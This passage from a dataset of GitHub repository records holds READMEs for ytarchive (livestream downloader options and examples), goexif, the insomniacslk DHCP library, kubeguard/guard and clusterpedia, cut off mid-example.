issue when --threads >1\n\t\tHighly recommended if you don't have strict RAM limitations. Especially\n\t\ton Wangblows, which has caused issues with file locking when trying to\n\t\tdelete fragment files.\n\n\t--no-merge\n\t\tDo not run the ffmpeg command for the downloaded streams\n\t\twhen sigint is received. You will be prompted otherwise.\n\n\t--no-save\n\t\tDo not save any downloaded data and files if not having ffmpeg\n\t\trun when sigint is received. You will be prompted otherwise.\n\n\t--no-video\n\t\tIf a googlevideo url is given or passed with --audio-url, do not\n\t\tprompt for a video url. 
If a video url is given with --video-url\n\t\tthen this is effectively ignored.\n\n\t-n\n\t--no-wait\n\t\tDo not wait for a livestream if it's a future scheduled stream.\n\n\t-o\n\t--output FILENAME_FORMAT\n\t\tSet the output file name EXCLUDING THE EXTENSION. Can include\n\t\tformatting similar to youtube-dl, albeit much more limited.\n\t\tSee FORMAT OPTIONS below for a list of available format keys.\n\t\tDefault is '%(title)s-%(id)s'\n\n\t-q\n\t--quiet\n\t\tPrint nothing to the console except information relevant for user input.\n\n\t--retry-frags ATTEMPTS\n\t\tSet the number of attempts to make when downloading a stream fragment.\n\t\tSet to 0 to retry indefinitely, or until we are completely unable to.\n\t\tDefault is 10.\n\n\t-r\n\t--retry-stream SECONDS\n\t\tIf waiting for a scheduled livestream, re-check if the stream is\n\t\tup every SECONDS instead of waiting for the initial scheduled time.\n\t\tIf SECONDS is less than the poll delay youtube gives (typically\n\t\t15 seconds), then this will be set to the value youtube provides.\n\n\t--save\n\t\tAutomatically save any downloaded data and files if not having\n\t\tffmpeg run when sigint is received. You will be prompted otherwise.\n\n\t--separate-audio\n\t\tSave the audio to a separate file, similar to when downloading\n\t\taudio_only, alongside the final muxed file. This includes embedding\n\t\tmetadata and the thumbnail if set.\n\n\t--threads THREAD_COUNT\n\t\tSet the number of threads to use for downloading audio and video\n\t\tfragments. The total number of threads running will be\n\t\tTHREAD_COUNT * 2 + 3. Main thread, a thread for each audio and\n\t\tvideo download, and THREAD_COUNT number of fragment downloaders\n\t\tfor both audio and video.\n\t\t\n\t\tSetting this to a large number has a chance at causing the download\n\t\tto start failing with HTTP 401. Restarting the download with a smaller\n\t\tthread count until you no longer get 401s should work. Default is 1.\n\n\t-t\n\t--thumbnail\n\t\tDownload and embed the stream thumbnail in the finished file.\n\t\tWhether the thumbnail shows properly depends on your file browser.\n\t\tWindows' seems to work. Nemo on Linux seemingly does not.\n\n\t--trace\n\t\tPrint just about any information that might have reason to be printed.\n\t\tVery spammy, do not use this unless you have good reason.\n\n\t-v\n\t--verbose\n\t\tPrint extra information.\n\n\t-V\n\t--version\n\t\tPrint the version number and exit.\n\n\t--video-url GOOGLEVIDEO_URL\n\t\tPass in the given url as the video fragment url. Must be a\n\t\tGoogle Video url with an itag parameter that is not 140.\n\n\t--vp9\n\t\tIf there is a VP9 version of your selected video quality,\n\t\tdownload that instead of the usual h264.\n\n\t-w\n\t--wait\n\t\tWait for a livestream if it's a future scheduled stream.\n\t\tIf this option is not used when a scheduled stream is provided,\n\t\tyou will be asked if you want to wait or not.\n\n\t--warn\n\t\tPrint warning, errors, and general information. This is the default log\n\t\tlevel.\n\n\t--write-description\n\t\tWrite the video description to a separate .description file.\n\t\n\t--write-mux-file\n\t\tWrite the ffmpeg command that would mux audio and video or put audio\n\t\tinto an mp4 container instead of running the command automatically.\n\t\tUseful if you want to tweak the command, want a higher log level, etc.\n\n\t--write-thumbnail\n\t\tWrite the thumbnail to a separate file.\n\nExamples:\n\tytarchive -w\n\t\tWaits for a stream. 
Will prompt for a URL and quality.\n\n\tytarchive -w https://www.youtube.com/watch?v=CnWDmKx9cQQ 1080p60/best\n\t\tWaits for the given stream URL. Will prioritize downloading in 1080p60.\n\t\tIf 1080p60 is not an available quality, it will choose the best of what\n\t\tis available.\n\n\tytarchive --threads 3 https://www.youtube.com/watch?v=ZK1GXnz-1Lw best\n\t\tDownloads the given stream with 3 threads in the best available quality.\n\t\tWill ask if you want to wait if the stream is scheduled but not started.\n\n\tytarchive -r 30 https://www.youtube.com/channel/UCZlDXzGoo7d44bwdNObFacg/live best\n\t\tWill wait for a livestream at the given URL, checking every 30 seconds.\n\n\tytarchive -c cookies-youtube-com.txt https://www.youtube.com/watch?v=_touw1GND-M best\n\t\tLoads the given cookies file and attempts to download the given stream.\n\t\tWill ask if you want to wait.\n\n\tytarchive --no-wait --add-metadata https://www.youtube.com/channel/UCvaTdHTWBGv3MKj3KVqJVCw/live best\n\t\tAttempts to download the given stream, and will add metadata to the\n\t\tfinal muxed file. Will not wait if there is no stream or if it has not\n\t\tstarted.\n\n\tytarchive -o '%(channel)s/%(upload_date)s_%(title)s' https://www.youtube.com/watch?v=HxV9UAMN12o best\n\t\tDownload the given stream to a directory with the channel name, and a\n\t\tfile that will have the upload date and stream title. Will prompt to\n\t\twait.\n\n\tytarchive -w -k -t --vp9 --merge --no-frag-files https://www.youtube.com/watch?v=LE8V5iNemBA best\n\t\tWaits, keeps the final .ts files, embeds the stream thumbnail, merges\n\t\tthe downloaded files if download is stopped manually, and keeps\n\t\tfragments in memory instead of writing to intermediate files.\n\t\tDownloads the stream video in VP9 if available. This set of flags will\n\t\tnot require any extra user input if something goes wrong.\n\n\tytarchive -k -t --vp9 --monitor-channel --no-frag-files https://www.youtube.com/channel/UCvaTdHTWBGv3MKj3KVqJVCw/live best\n\t\tSame as above, but waits for a stream on the given channel, and will\n\t\trepeat the cycle after downloading each stream.\n\nFORMAT TEMPLATE OPTIONS\n\tFormat template keys provided are made to be the same as they would be for\n\tyoutube-dl. 
See https://github.com/ytdl-org/youtube-dl#output-template\n\n\tFor file names, each template substitution is sanitized by replacing invalid file name\n\tcharacters with underscore (_).\n\n\tid (string): Video identifier\n\turl (string): Video URL\n\ttitle (string): Video title\n\tchannel_id (string): ID of the channel\n\tchannel (string): Full name of the channel the livestream is on\n\tupload_date (string: YYYYMMDD): Technically stream start date, UTC timezone - see note below\n\tstart_date (string: YYYYMMDD): Stream start date, UTC timezone\n\tpublish_date (string: YYYYMMDD): Stream publish date, UTC timezone\n\tdescription (string): Video description [disallowed for file name format template]\n\n\tNote on upload_date: rather than the actual upload date, stream start date is used to\n\tprovide a better default date for youtube-dl output templates that use upload_date.\n\tTo get the actual upload date, publish date seems to be the same as upload date for streams.\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rwcarlsen/goexif", "link": "https://github.com/rwcarlsen/goexif", "tags": [], "stars": 551, "description": "Decode embedded EXIF meta data from image files.", "lang": "Go", "repo_lang": "", "readme": "goexif\n======\n\n[![GoDoc](https://godoc.org/github.com/rwcarlsen/goexif?status.svg)](https://godoc.org/github.com/rwcarlsen/goexif)\n\nProvides decoding of basic exif and tiff encoded data. Still in alpha - no guarantees.\nSuggestions and pull requests are welcome. Functionality is split into two packages - \"exif\" and \"tiff\"\nThe exif package depends on the tiff package. \n\nLike goexif? - Bitcoin Cash tips welcome: 1DrU5V37nTXuv4vnRLVpahJEjhdATNgoBh\n\nTo install, in a terminal type:\n\n```\ngo get github.com/rwcarlsen/goexif/exif\n```\n\nOr if you just want the tiff package:\n\n```\ngo get github.com/rwcarlsen/goexif/tiff\n```\n\nExample usage:\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"os\"\n\n\t\"github.com/rwcarlsen/goexif/exif\"\n\t\"github.com/rwcarlsen/goexif/mknote\"\n)\n\nfunc ExampleDecode() {\n\tfname := \"sample1.jpg\"\n\n\tf, err := os.Open(fname)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Optionally register camera makenote data parsing - currently Nikon and\n\t// Canon are supported.\n\texif.RegisterParsers(mknote.All...)\n\n\tx, err := exif.Decode(f)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tcamModel, _ := x.Get(exif.Model) // normally, don't ignore errors!\n\tfmt.Println(camModel.StringVal())\n\n\tfocal, _ := x.Get(exif.FocalLength)\n\tnumer, denom, _ := focal.Rat2(0) // retrieve first (only) rat. 
value\n\tfmt.Printf(\"%v/%v\", numer, denom)\n\n\t// Two convenience functions exist for date/time taken and GPS coords:\n\ttm, _ := x.DateTime()\n\tfmt.Println(\"Taken: \", tm)\n\n\tlat, long, _ := x.LatLong()\n\tfmt.Println(\"lat, long: \", lat, \", \", long)\n}\n```\n\n\n[![githalytics.com alpha](https://cruel-carlota.pagodabox.com/5e166f74cdb82b999ccd84e3c4dc4348 \"githalytics.com\")](http://githalytics.com/rwcarlsen/goexif)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "insomniacslk/dhcp", "link": "https://github.com/insomniacslk/dhcp", "tags": ["dhcpv6", "dhcpv6-packet", "dhcpv6-server", "dhcp", "dhcp-server", "dhcpd", "dhcp-client", "dhcpd-server", "dhcpv4", "golang", "go"], "stars": 551, "description": "DHCPv6 and DHCPv4 packet library, client and server written in Go", "lang": "Go", "repo_lang": "", "readme": "# dhcp\n[![Build Status](https://img.shields.io/github/workflow/status/insomniacslk/dhcp/Tests/master)](https://github.com/insomniacslk/dhcp/actions?query=branch%3Amaster)\n[![GoDoc](https://godoc.org/github.com/insomniacslk/dhcp?status.svg)](https://godoc.org/github.com/insomniacslk/dhcp)\n[![codecov](https://codecov.io/gh/insomniacslk/dhcp/branch/master/graph/badge.svg)](https://codecov.io/gh/insomniacslk/dhcp)\n[![Go Report Card](https://goreportcard.com/badge/github.com/insomniacslk/dhcp)](https://goreportcard.com/report/github.com/insomniacslk/dhcp)\n\nDHCPv4 and DHCPv6 decoding/encoding library with client and server code, written in Go.\n\n# How to get the library\n\nThe library is split into several parts:\n* `dhcpv6`: implementation of DHCPv6 packet, client and server\n* `dhcpv4`: implementation of DHCPv4 packet, client and server\n* `netboot`: network booting wrappers on top of `dhcpv6` and `dhcpv4`\n* `iana`: several IANA constants, and helpers used by `dhcpv6` and `dhcpv4`\n* `rfc1035label`: simple implementation of RFC1035 labels, used by `dhcpv6` and\n `dhcpv4`\n* `interfaces`, a thin layer of wrappers around network interfaces\n\nYou will probably only need `dhcpv6` and/or `dhcpv4` explicitly. 
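For instance, here is a minimal, hedged sketch of crafting a DHCPv4 DISCOVER message with just the `dhcpv4` package (the MAC address is made up; check the package documentation for exact signatures):\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/insomniacslk/dhcp/dhcpv4\"\n)\n\nfunc main() {\n\t// Hypothetical client MAC address.\n\tmac, err := net.ParseMAC(\"de:ad:be:ef:00:01\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// Build a DISCOVER packet; the library fills in sensible defaults.\n\tdiscover, err := dhcpv4.NewDiscovery(mac)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tfmt.Println(discover.Summary())\n}\n```\n\nOnly the `dhcpv4` package is imported explicitly in this sketch. 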
The rest is\npulled in automatically if necessary.\n\n\nSo, to get `dhcpv6` and `dhcpv4` just run:\n```\ngo get -u github.com/insomniacslk/dhcp/dhcpv{4,6}\n```\n\n\n# Examples\n\nThe sections below will illustrate how to use the `dhcpv6` and `dhcpv4`\npackages.\n\n* [dhcpv6 client](examples/client6/)\n* [dhcpv6 server](examples/server6/)\n* [dhcpv6 packet crafting](examples/packetcrafting6)\n* TODO dhcpv4 client\n* TODO dhcpv4 server\n* TODO dhcpv4 packet crafting\n\n\nSee more example code at https://github.com/insomniacslk/exdhcp\n\n\n# Public projects that use it\n\n* Facebook's DHCP load balancer, `dhcplb`, https://github.com/facebookincubator/dhcplb\n* Systemboot, a LinuxBoot distribution that runs as system firmware, https://github.com/systemboot/systemboot\n* Router7, a pure-Go router implementation for fiber7 connections, https://github.com/rtr7/router7\n* Beats from ElasticSearch, https://github.com/elastic/beats\n* Bender from Pinterest, a library for load-testing, https://github.com/pinterest/bender\n* FBender from Facebook, a tool for load-testing based on Bender, https://github.com/facebookincubator/fbender\n* CoreDHCP, a fast, multithreaded, modular and extensible DHCP server, https://github.com/coredhcp/coredhcp\n* u-root, an embeddable root file system, https://github.com/u-root/u-root\n* Talos: a modern OS for Kubernetes, https://github.com/talos-systems/talos\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubeguard/guard", "link": "https://github.com/kubeguard/guard", "tags": ["kubernetes", "rbac", "github", "google", "appscode"], "stars": 551, "description": "\ud83d\udd11 Kubernetes Authentication & Authorization WebHook Server", "lang": "Go", "repo_lang": "", "readme": "

\n\n[![Build Status](https://github.com/kubeguard/guard/workflows/CI/badge.svg)](https://github.com/kubeguard/guard/actions?workflow=CI)\n[![codecov](https://codecov.io/gh/kubeguard/guard/branch/master/graph/badge.svg)](https://codecov.io/gh/kubeguard/guard)\n[![Docker Pulls](https://img.shields.io/docker/pulls/appscode/guard.svg)](https://hub.docker.com/r/appscode/guard/)\n[![Twitter](https://img.shields.io/twitter/follow/kubeguard.svg?style=social&logo=twitter&label=Follow)](https://twitter.com/intent/follow?screen_name=KubeGuard)\n\n# Guard\nGuard by AppsCode is a [Kubernetes Webhook Authentication](https://kubernetes.io/docs/admin/authentication/#webhook-token-authentication) server. Using guard, you can log into your Kubernetes cluster using various auth providers. Guard also configures groups of authenticated user appropriately. This allows cluster administrator to setup RBAC rules based on membership in groups. Guard supports following auth providers:\n\n- [Static Token File](https://appscode.com/products/guard/latest/guides/authenticator/static_token_file/)\n- [Github](https://appscode.com/products/guard/latest/guides/authenticator/github/)\n- [Gitlab](https://appscode.com/products/guard/latest/guides/authenticator/gitlab/)\n- [Google](https://appscode.com/products/guard/latest/guides/authenticator/google/)\n- [Azure](https://appscode.com/products/guard/latest/guides/authenticator/azure/)\n- [LDAP using Simple or Kerberos authentication](https://appscode.com/products/guard/latest/guides/authenticator/ldap/)\n- [Azure Active Directory via LDAP](https://appscode.com/products/guard/latest/guides/authenticator/ldap_azure/)\n\n## Supported Versions\nKubernetes 1.9+\n\n## Installation\nTo install Guard, please follow the guide [here](https://appscode.com/products/guard/latest/setup/install/).\n\n## Using Guard\nWant to learn how to use Guard? Please start [here](https://appscode.com/products/guard/latest/).\n\n## Contribution guidelines\nWant to help improve Guard? Please start [here](https://appscode.com/products/guard/latest/welcome/contributing/).\n\n## Acknowledgement\n\n- [apprenda-kismatic/kubernetes-ldap](https://github.com/apprenda-kismatic/kubernetes-ldap)\n- [Nike-Inc/harbormaster](https://github.com/Nike-Inc/harbormaster)\n\n## Support\nWe use Slack for public discussions. To chit chat with us or the rest of the community, join us in the [AppsCode Slack team](https://appscode.slack.com/messages/C8M8HANQ0/details/) channel `#guard`. To sign up, use our [Slack inviter](https://slack.appscode.com/).\n\nIf you have found a bug with Guard or want to request for new features, please [file an issue](https://github.com/kubeguard/guard/issues/new).\n\n

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clusterpedia-io/clusterpedia", "link": "https://github.com/clusterpedia-io/clusterpedia", "tags": ["k8s-sig-multicluster", "multi-cloud-kubernetes", "multi-cluster", "kubernetes", "k8s"], "stars": 551, "description": "The Encyclopedia of Kubernetes clusters", "lang": "Go", "repo_lang": "", "readme": "
\nThe Encyclopedia of Kubernetes clusters\n
\n\n# Clusterpedia\n![build](https://github.com/clusterpedia-io/clusterpedia/actions/workflows/ci.yml/badge.svg)\n[![License](https://img.shields.io/github/license/clusterpedia-io/clusterpedia)](/LICENSE)\n[![Go Report Card](https://goreportcard.com/badge/github.com/clusterpedia-io/clusterpedia)](https://goreportcard.com/report/github.com/clusterpedia-io/clusterpedia)\n[![Release](https://img.shields.io/github/v/release/clusterpedia-io/clusterpedia)](https://github.com/clusterpedia-io/clusterpedia/releases)\n[![Artifact Hub](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/clusterpedia)](https://artifacthub.io/packages/search?repo=clusterpedia)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/5539/badge)](https://bestpractices.coreinfrastructure.org/projects/5539)\n[![Join Slack channel](https://img.shields.io/badge/slack-@cncf/clusterpedia-30c000.svg?logo=slack)](https://cloud-native.slack.com/messages/clusterpedia)\n\nThe name Clusterpedia is inspired by Wikipedia. Clusterpedia is an encyclopedia of multiple clusters, used to synchronize, search for, and simply control multi-cluster resources. \n\nClusterpedia can synchronize resources across multiple clusters and provide more powerful search features on top of compatibility with the Kubernetes OpenAPI, helping you quickly and easily find any multi-cluster resource you are looking for. \n\n> Clusterpedia is meant not only for searching and viewing resources, but in the future also for simple control of them, just as Wikipedia supports editing entries.\n\n**Clusterpedia is a [Cloud Native Computing Foundation](https://cncf.io/) sandbox project.**\n> If you want to join the clusterpedia channel on CNCF slack, please **[get an invite to CNCF slack](https://slack.cncf.io/)** and then join the [#clusterpedia](https://cloud-native.slack.com/messages/clusterpedia) channel.\n\n## Why Clusterpedia\nClusterpedia can be deployed as a standalone platform or integrated with [Cluster API](https://github.com/kubernetes-sigs/cluster-api), [Karmada](https://github.com/karmada-io/karmada), [Clusternet](https://github.com/clusternet/clusternet) and other multi-cloud platforms.\n\n### Automatic synchronization of clusters managed by multi-cloud platforms\nClusterpedia can automatically synchronize the resources within the clusters managed by a multi-cloud platform.\n\nUsers do not need to maintain Clusterpedia manually; it works just like an internal component of the multi-cloud platform.\n\nLearn more about [Interfacing to Multi-Cloud Platforms](https://clusterpedia.io/docs/usage/interfacing-to-multi-cloud-platforms/)\n\n### More retrieval features and compatibility with **Kubernetes OpenAPI**\n* Support for retrieving resources using `kubectl`, `client-go` or `controller-runtime/client`, [client-go example](https://github.com/clusterpedia-io/client-go/blob/main/examples/list-clusterpedia-resources/main.go)\n* The resource metadata can be retrieved via the API or [client-go/metadata](https://pkg.go.dev/k8s.io/client-go/metadata)\n* Rich retrieval conditions: [Filter by cluster/namespace/name/creation](https://clusterpedia.io/docs/usage/search/multi-cluster/#basic-features), [Search by parent or ancestor owner](https://clusterpedia.io/docs/usage/search/multi-cluster/#search-by-parent-or-ancestor-owner), [Multi-Cluster Label Selector](https://clusterpedia.io/docs/usage/search/#label-selector), [Enhanced Field Selector](https://clusterpedia.io/docs/usage/search/#field-selector), 
[Custom Search Conditions](https://clusterpedia.io/docs/usage/search/#advanced-searchcustom-conditional-search), etc.\n### Support for importing Kubernetes 1.10+\n### Automatic conversion between different versions of Kube resources and support for multiple resource versions\n* Even if you import clusters running different versions of Kubernetes, you can still use the same resource version to retrieve resources\n> For example, we can use the `v1`, `v1beta2` or `v1beta1` version to retrieve the Deployments resources in different clusters.\n> \n> Note: The version of *deployments* is `v1beta1` in Kubernetes 1.10 and `v1` in Kubernetes 1.24.\n```bash\n$ kubectl get --raw \"/apis/clusterpedia.io/v1beta1/resources/apis/apps\" | jq\n{\n \"kind\": \"APIGroup\",\n \"apiVersion\": \"v1\",\n \"name\": \"apps\",\n \"versions\": [\n {\n \"groupVersion\": \"apps/v1\",\n \"version\": \"v1\"\n },\n {\n \"groupVersion\": \"apps/v1beta2\",\n \"version\": \"v1beta2\"\n },\n {\n \"groupVersion\": \"apps/v1beta1\",\n \"version\": \"v1beta1\"\n }\n ],\n \"preferredVersion\": {\n \"groupVersion\": \"apps/v1\",\n \"version\": \"v1\"\n }\n}\n```\n### A single API can be used to retrieve different types of resources\n* Use [`Collection Resource`](https://clusterpedia.io/docs/concepts/collection-resource/) to retrieve different types of resources, such as `Deployment`, `DaemonSet`, `StatefulSet`.\n```bash\n$ kubectl get collectionresources\nNAME RESOURCES\nany *\nworkloads deployments.apps,daemonsets.apps,statefulsets.apps\nkuberesources .*,*.admission.k8s.io,*.admissionregistration.k8s.io,*.apiextensions.k8s.io,*.apps,*.authentication.k8s.io,*.authorization.k8s.io,*.autoscaling,*.batch,*.certificates.k8s.io,*.coordination.k8s.io,*.discovery.k8s.io,*.events.k8s.io,*.extensions,*.flowcontrol.apiserver.k8s.io,*.imagepolicy.k8s.io,*.internal.apiserver.k8s.io,*.networking.k8s.io,*.node.k8s.io,*.policy,*.rbac.authorization.k8s.io,*.scheduling.k8s.io,*.storage.k8s.io\n```\n### Diverse policies and intelligent synchronization\n* [Wildcards](https://clusterpedia.io/docs/usage/sync-resources/#using-wildcards-to-sync-resources) can be used to sync all types of resources within a specified group or cluster.\n* [Support for synchronizing all custom resources](https://clusterpedia.io/docs/usage/sync-resources/#sync-all-custom-resources)\n* The types and versions of resources that Clusterpedia synchronizes automatically adapt to your CRD and AA changes\n### Unify the search entry for master clusters and multi-cluster resources\n* Based on the [Aggregated API](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/), the entry portal for multi-cluster retrieval is the same as that of the master cluster (IP:PORT)\n### Very low memory usage and weak network optimization\n* The caches used by the informers are optimized, so memory usage for resource synchronization is very low.\n* Automatic start/stop of synchronization based on cluster health status\n### High availability\n### No dependency on specific storage components\nClusterpedia does not depend on any specific storage component; it uses a storage layer to attach the storage component of your choice,\nand storage layers for **graph databases** and **ES** will also be added in the future\n\n## Architecture\n
\nThe architecture consists of four parts:\n\n* **Clusterpedia APIServer**: Register to `Kubernetes APIServer` by the means of [Aggregated API](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) and provide services through a unified entrance\n* **ClusterSynchro Manager**: Manage the cluster synchro that is used to synchronize cluster resources\n* **Storage Layer**: Connect with a specific storage component and then register to Clusterpedia APIServer and ClusterSynchro Manager via a storage layer interface\n* **Storage Component**: A specific storage facility such as **MySQL**, **PostgreSQL**, **Redis** or other **Graph Databases**\n\nIn addition, Clusterpedia will use the Custom Resource - *PediaCluster* to implement cluster authentication and configure resources for synchronization.\n\nClusterpedia also provides a `Default Storage Layer` that can connect with **MySQL** and **PostgreSQL**.\n> Clusterpedia does not care about the specific storage components used by users,\n> you can choose or implement the storage layer according to your own needs,\n> and then register the storage layer in Clusterpedia as a plug-in\n\n---\n[Installation](https://clusterpedia.io/docs/installation/) | [Import Clusters](https://clusterpedia.io/docs/usage/import-clusters/) | [Sync Cluster Resources](https://clusterpedia.io/docs/usage/sync-resources/)\n---\n\n## Search Label and URL Query\n|Role| search label key|url query|\n| -- | --------------- | ------- |\n|Filter cluster names|`search.clusterpedia.io/clusters`|`clusters`|\n|Filter namespaces|`search.clusterpedia.io/namespaces`|`namespaces`|\n|Filter resource names|`search.clusterpedia.io/names`|`names`|\n|Fuzzy Search by resource name|`internalstorage.clusterpedia.io/fuzzy-name`|-|\n|Since creation time|`search.clusterpedia.io/since`|`since`|\n|Before creation time|`search.clusterpedia.io/before`|`before`|\n|Specified Owner UID|`search.clusterpedia.io/owner-uid`|`ownerUID`|\n|Specified Owner Seniority|`search.clusterpedia.io/owner-seniority`|`ownerSeniority`|\n|Specified Owner Name|`search.clusterpedia.io/owner-name`|`ownerName`|\n|Specified Owner Group Resource|`search.clusterpedia.io/owner-gr`|`ownerGR`|\n|Order by fields|`search.clusterpedia.io/orderby`|`orderby`|\n|Set page size|`search.clusterpedia.io/size`|`limit`|\n|Set page offset|`search.clusterpedia.io/offset`|`continue`|\n|Response include Continue|`search.clusterpedia.io/with-continue`|`withContinue`\n|Response include remaining count|`search.clusterpedia.io/with-remaining-count`|`withRemainingCount`\n|[Custom Where SQL](https://clusterpedia.io/docs/usage/search/#advanced-searchcustom-conditional-search)|-|`whereSQL`|\n|[Get only the metadata of the collection resource](https://clusterpedia.io/docs/usage/search/collection-resource#only-metadata) | - |`onlyMetadata` |\n|[Specify the groups of `any collectionresource`](https://clusterpedia.io/docs/usage/search/collection-resource#any-collectionresource) | - | `groups` |\n|[Specify the resources of `any collectionresource`](https://clusterpedia.io/docs/usage/search/collection-resource#any-collectionresource) | - | `resources` |\n\n**Both Search Labels and URL Query support same operators as Label Selector:**\n* `exist`, `not exist`\n* `=`, `==`, `!=`\n* `in`, `notin`\n\nMore information about [Search Conditions](https://clusterpedia.io/docs/usage/search/),\n[Label Selector](https://clusterpedia.io/docs/usage/search/#label-selector) and [Field 
Selector](https://clusterpedia.io/docs/usage/search/#field-selector)\n\n## Usage Samples\nYou can search for resources configured in *PediaCluster*, Clusterpedia supports two types of resource search:\n* Resources that are compatible with **Kubernetes OpenAPI**\n* [`Collection Resource`](https://clusterpedia.io/docs/concepts/collection-resource/)\n```sh\n$ kubectl api-resources | grep clusterpedia.io\ncollectionresources clusterpedia.io/v1beta1 false CollectionResource\nresources clusterpedia.io/v1beta1 false Resources\n```\n### Use a compatible way with Kubernetes OpenAPI\nIt is possible to search resources via URL, but using `kubectl` may be more convenient if\nyou [configured the cluster shortcuts for `kubectl`](https://clusterpedia.io/docs/usage/access-clusterpedia/#configure-the-cluster-shortcut-for-kubectl).\n\nWe can use `kubectl --cluster ` to specify the cluster, if `` is `clusterpedia`,\nit meas it is a multi-cluster search operation.\n\nFirst check which resources are synchronized. We cannot find a resource until it is properly synchronized:\n```sh\n$ kubectl --cluster clusterpedia api-resources\nNAME SHORTNAMES APIVERSION NAMESPACED KIND\nconfigmaps cm v1 true ConfigMap\nevents ev v1 true Event\nnamespaces ns v1 false Namespace\nnodes no v1 false Node\npods po v1 true Pod\nservices svc v1 true Service\ndaemonsets ds apps/v1 true DaemonSet\ndeployments deploy apps/v1 true Deployment\nreplicasets rs apps/v1 true ReplicaSet\nstatefulsets sts apps/v1 true StatefulSet\ncronjobs cj batch/v1 true CronJob\njobs batch/v1 true Job\nclusters cluster.kpanda.io/v1alpha1 false Cluster\ningressclasses networking.k8s.io/v1 false IngressClass\ningresses ing networking.k8s.io/v1 true Ingress\nclusterrolebindings rbac.authorization.k8s.io/v1 false ClusterRoleBinding\nclusterroles rbac.authorization.k8s.io/v1 false ClusterRole\nroles rbac.authorization.k8s.io/v1 true Role\n\n$ kubectl --cluster cluster-1 api-resources\n...\n```\n\n#### Search in Multiple Clusters\n> Usage of [multi-cluster search](https://clusterpedia.io/docs/usage/search/multi-cluster/) in documents\n\n**Get deployments in the `kube-system` namespace of all clusters:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -n kube-system\nCLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\ncluster-1 coredns 2/2 2 2 68d\ncluster-2 calico-kube-controllers 1/1 1 1 64d\ncluster-2 coredns 2/2 2 2 64d\n```\n\n**Get deployments in the two namespaces `kube-system` and `default` of all clusters:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/namespaces in (kube-system, default)\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n**Get deployments in the `kube-system` and `default` namespaces in cluster-1 and cluster-2:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/clusters in (cluster-1, cluster-2),\\\n search.clusterpedia.io/namespaces in (kube-system,default)\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault 
cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n**Get deployments in the `kube-system` and `default` namespaces in cluster-1 and cluster-2:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/clusters in (cluster-1, cluster-2),\\\n search.clusterpedia.io/namespaces in (kube-system,default),\\\n search.clusterpedia.io/orderby=name\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n#### Search a specific cluster\n> Usage of [specified cluster search](https://clusterpedia.io/docs/usage/search/specified-cluster/) in documents\n\n**If you want to search a specific cluster for any resource therein, you can add --cluster to specify the cluster name:**\n```sh\n$ kubectl --cluster cluster-1 get deployments -A\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\ncalico-apiserver cluster-1 calico-apiserver 1/1 1 1 68d\ncalico-system cluster-1 calico-kube-controllers 1/1 1 1 68d\ncalico-system cluster-1 calico-typha 1/1 1 1 68d\ncapi-system cluster-1 capi-controller-manager 1/1 1 1 42d\ncapi-kubeadm-bootstrap-system cluster-1 capi-kubeadm-bootstrap-controller-manager 1/1 1 1 42d\ncapi-kubeadm-control-plane-system cluster-1 capi-kubeadm-control-plane-controller-manager 1/1 1 1 42d\ncapv-system cluster-1 capv-controller-manager 1/1 1 1 42d\ncert-manager cluster-1 cert-manager 1/1 1 1 42d\ncert-manager cluster-1 cert-manager-cainjector 1/1 1 1 42d\ncert-manager cluster-1 cert-manager-webhook 